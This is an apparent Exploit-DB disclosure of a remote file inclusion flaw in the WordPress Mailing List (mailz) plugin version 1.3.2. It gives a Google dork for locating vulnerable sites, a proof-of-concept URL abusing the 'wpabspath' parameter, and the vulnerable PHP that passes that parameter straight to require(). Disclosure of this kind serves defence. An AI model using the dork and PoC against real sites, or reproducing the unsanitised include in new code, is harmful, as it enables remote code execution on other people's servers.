WordPress Plugin Mailing List 1.3.2 - Remote File Inclusion

Author: Ben Schmidt
type: webapps
platform: php
port: 
date_added: 2011-09-19  
date_updated: 2011-09-19  
verified: 0  
codes: OSVDB-75618;OSVDB-75617  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.commailz.1.3.2.zip  

raw file: 17866.txt  
# Exploit Title: Mailing List Wordpress plugin RFI
# Google Dork: inurl:wp-content/plugins/mailz
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mailz/download/
# Version: 1.3.2 (tested)

---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/mailz/lists/config/config.php?wpabspath=RFI

---
Vulnerable Code
---
if ( isset($_GET['wpabspath']) ) {
	//zingiri
	//error_reporting(E_ALL & ~E_NOTICE);
	//ini_set('display_errors', '1');
	define('ABSPATH', dirname(__FILE__) . '/');
	require($_GET['wpabspath'].'wp-config.php');